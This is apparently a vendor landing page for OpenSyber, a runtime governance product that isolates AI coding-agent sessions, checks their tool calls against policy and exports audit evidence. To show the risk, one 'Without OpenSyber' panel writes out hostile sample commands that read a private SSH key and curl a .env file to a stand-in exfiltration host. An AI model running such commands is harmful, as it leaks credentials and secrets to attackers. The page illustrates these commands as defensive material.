Skip to content

Runtime Governance For AI-Assisted Engineering

Govern AI-Assisted Engineering
Before It Reaches
Production.

Your employees, contractors, and AI agents already use Claude and Cursor on your repos. OpenSyber isolates the session, controls what each tool can do, and exports the evidence.

Start pilot

Create workspace

Connect one repo

Scope branch access

Start governed session

Employee, contractor, or agent

Watch DENIED

Export evidence

Pilot path: one repo, one agent session, one blocked action. Start with an unmanaged-device contractor; expand across the team.

Browser-isolated
Policy-enforced
Device-bound identity
Evidence export
opensyber.cloud/dashboard

Live governed session

The moment buyers remember

Claude tries to run a production deploy. OpenSyber blocks the action, explains the matched policy, and prepares the audit export.

AI agent

Deploy production

OpenSyber

DENIED

Policy

Agent cannot mutate prod

Audit

Evidence generated

Evidence ready

Prompt, tool call, repo, policy decision, and export manifest linked in one chain.

1 repo

Pilot scope

30 min

Setup path

Ready

Audit

Block, explain, export

BLOCKEDAI agent requested: deploy production
EXPLAINEDPolicy matched — production writes require employee approval
EXPORTEvidence pack ready — prompt, tool call, repo, policy
SCOPEDGitHub scoped to repo: billing-api
OKAgent continues safely in staging

Let me ask you something

YOUR AI AGENT IS USING CLAUDE RIGHT NOW

On your repo. With your secrets. Through a workflow security may not control. Existing security sees users and endpoints; it often misses the agent's tool calls and delegated actions.

Without OpenSyber

$ agent exec --tool=shell "cat ~/.ssh/id_rsa"
$ curl -s https://exfil.bad/collect -d @.env
$ npm install totally-legit-pkg@latest

Operator + Claude + your repo + no action-level visibility.

With OpenSyber

DENIEDUnscoped GitHub token blocked — workspace held
ALERTMCP exfil pattern detected — session paused
AUDITEDProduction Terraform apply blocked by policy

Isolated workspace. MCP gateway. Policy on every tool call. Audit on every action.

Built for security review, not certification theater

Zero-Trust Architecture
Cloudflare Edge
SOC 2 / ISO 27001 evidence
GDPR-aligned controls

Plain English

Control AI-assisted engineering without giving AI the keys.

OpenSyber is not VDI, PAM, or another scanner. It is the runtime control point between an AI agent and the systems it can change.

Lower AI action risk

Block prod deploys, credential abuse, and repo actions that fall outside the agreed scope.

Faster onboarding

Start with an external developer on an unmanaged device, then extend the same controls to employees and autonomous agents.

Fewer blind incidents

See the prompt, tool call, shell command, Git action, and policy decision in the same timeline.

Audit evidence

Export the denied action and its explanation as evidence for security, compliance, and customer review.

Watch a prod deploy get blocked

What you buy

A governed workspace for employees, contractors, and agents using Claude, Cursor, shell, GitHub, and cloud tools on your repos.

What it controls

Every governed MCP tool action goes through one policy chokepoint before it can touch configured code, secrets, infrastructure, or production resources.

How it is priced

Start with one governed workspace. Expand across external developers, internal teams, autonomous agents, and protected repos as usage grows.

Proof before logos

We will not fake customer logos. A design-partner pilot should produce evidence you can inspect.

30-minute guided setup path
One repo scoped for the pilot
Denied production action replay
Exportable evidence pack
Trust Graph baseline

The moat

THE TRUST GRAPH

OpenSyber links AI prompts, tool calls, shell activity, Git operations, and infrastructure changes into one explainable execution chain.

User
Agent
Prompt
Tool
MCP Server
Database
Secret
Model

Questions it answers instantly

Which agents can access customer data?

Which tools use production credentials?

What is the blast radius if this agent is compromised?

What systems are affected when something breaks?

What happens after signup

CONNECT A REPO. RUN AN AGENT. WATCH A RISKY ACTION GET BLOCKED.

The first win is concrete: one repo, one governed agent session, one risky action denied with an evidence trail.

STEP 01

CONNECT ONE REPO

Pick the GitHub repo and branch the contractor is allowed to touch. Start narrow; expand only after the audit trail makes sense.

STEP 02

START A GOVERNED SESSION

An employee, contractor, or approved service runs AI tools inside a controlled workspace. Code and secrets stay inside the governed boundary.

STEP 03

BLOCK, EXPLAIN, EXPORT

When Claude asks for a risky action, OpenSyber denies it, explains the rule, and exports the prompt-to-action evidence.

~/your-project — zsh
$opensyber invite contractor@example.com

Buyer path

FROM DEMO TO GOVERNED AI ENGINEERING

The first value moment is a denied risky action plus an audit chain. The paid rollout adds identity, SIEM, evidence, and repeatable workspace policy.

90-day readiness program

For security buyers, the pilot output is concrete: an agent inventory, a Trust Graph baseline, starter policies, and exportable evidence mapped to your audit framework.

  • AI agent inventory
  • Baseline Trust Graph
  • MCP policy set
  • Compliance evidence export

Runtime governance

EVERY ACTION HAS A CHAIN

When an operator or autonomous agent asks Claude to apply Terraform in production, six things happen in order. The gateway sees them all. The audit log keeps them linked.

  1. Operator
    device-bound identity
  2. Claude
    prompt + tool plan
  3. MCP gateway
    policy check
  4. Repo
    scoped PAT
  5. Terraform apply
    prod target
  6. DENIED
    policy: no prod apply

Same chain renders in the audit log. Same chain renders in the compliance export.

AI-ASSISTED ENGINEERING RUNTIME GOVERNANCE

An external developer, employee, or autonomous agent asks Claude for a prod Terraform deploy. Watch the gateway deny it, the chain explain why, and the audit row land.

Open the governed agent demo

What you get

ONE WORKSPACE, FULL GOVERNANCE

ISOLATED BROWSER WORKSPACE

An employee, contractor, or approved service opens a hardened session. Claude, Cursor, MCP servers, and shell are governed in one place. Device-bound session keys via TokenForge.

  • Browser isolation (Kasm)
  • Device-bound operator identity
  • AI tools and MCP pre-installed

MCP POLICY CHOKEPOINT

Every MCP tool call routes through the OpenSyber gateway. Allow, deny, redact, or step-up auth. Block prod Terraform, force PII redaction, scope GitHub to a single repo and branch.

  • Per-workspace MCP allowlists
  • GitHub policy bridge (scoped PATs)
  • Step-up auth on high-risk tool calls
Explore

EXPLAINABLE AUDIT

Every prompt, MCP call, shell command, and GitHub action is linked into one trail. Reviewers see exactly what Claude did, what file it touched, what cluster it hit, and which policy approved it.

  • Prompt-to-action linking
  • Runtime telemetry (Falco / osquery)
  • SOC 2 / ISO 27001 / HIPAA evidence export
Explore

Integrates with

WORKS WITH YOUR AI, IDENTITY, AND SOC STACK

OpenSyber sits between contractors, coding agents, MCP servers, source control, cloud, identity, and your SIEM. No rip-and-replace.

Anthropic
Cursor
Windsurf
VS Code
Claude Desktop
GitHub
GitLab
Okta
Entra ID
AWS
Cloudflare
Splunk
Datadog
Sentinel

Integrations and connectors. Names are trademarks of their respective owners; listing does not imply endorsement.

The four outcomes

DISCOVER. GOVERN. PROTECT. AUDIT.

One workspace covers the full lifecycle of AI-assisted access to your repos and infra — from the first unknown agent to the last audited action.

DISCOVER

See every AI agent, MCP server, and shadow-AI tool touching your stack.

  • Full AI agent inventory across teams and contractors
  • MCP server and tool discovery
  • Shadow-AI detection for unsanctioned assistants

Surface known and shadow AI assets across your connected workspaces

GOVERN

Decide what AI can do before it does it, not after.

  • Policy engine as an MCP chokepoint
  • Approval workflows for sensitive actions
  • Per-agent permissions scoped to repos and infra

Block unauthorized AI actions before they run

PROTECT

Stop secret leaks, prompt injection, and poisoned MCP tools at runtime.

  • Secret protection and prompt-injection detection
  • MCP rug-pull and cross-session drift detection
  • Supply-chain scanning with browser isolation

Catch MCP rug-pulls others miss — across days, not one session

AUDIT

Prove what every AI action did, mapped to repo and infra changes.

  • Explainable audit trail for every agent action
  • AI Act, SOC 2, and ISO 27001 evidence generation
  • Compliance-ready exports on demand

Audit-ready evidence on every AI action

GOVERN THE AI YOUR ENGINEERING TEAM ALREADY USES

Employees, contractors, and autonomous agents are running Claude and Cursor against your repos right now. Put a policy gateway and an audit trail between them and production.

  • IsolateBrowser-isolated workspace. Code, secrets, and MCP servers stay inside the governed boundary.
  • GovernEvery Claude and Cursor tool call hits the MCP policy chokepoint: allow, step-up, or deny per action.
  • AuditEvery AI action is linked to the repo or infra action it caused — one explainable, compliance-ready trail.

No managed laptop. No VPN. No sales call.